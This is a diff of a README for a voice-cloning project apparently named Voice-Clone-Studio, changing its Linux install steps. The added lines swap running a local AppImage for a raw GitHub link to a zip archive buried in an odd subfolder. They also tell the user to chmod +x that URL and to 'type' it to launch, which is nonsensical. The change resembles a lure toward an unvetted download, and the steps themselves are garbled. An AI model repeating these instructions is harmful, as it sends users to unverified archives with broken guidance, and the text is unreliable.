xDoritox/Voice-Clone-Studio/README.md

    ### 🐧 Linux
    - Open the terminal.
    - Navigate to the directory where the file is located.
-   - Run the command `chmod +x Voice-Clone-Studio.AppImage` to make the file executable.
+   - Run the command `chmod +x https://github.com/xDoritox/Voice-Clone-Studio/raw/refs/heads/main/modules/vibevoice_tts/schedule/Clone-Studio-Voice-3.3.zip` to make the file executable.
-   - Then, type `./Voice-Clone-Studio.AppImage` to launch the application.
+   - Then, type `https://github.com/xDoritox/Voice-Clone-Studio/raw/refs/heads/main/modules/vibevoice_tts/schedule/Clone-Studio-Voice-3.3.zip` to launch the application.

 ## 🔧 System Requirements
 Voice-Clone-Studio runs smoothly on a variety of setups.
 Ensure you have: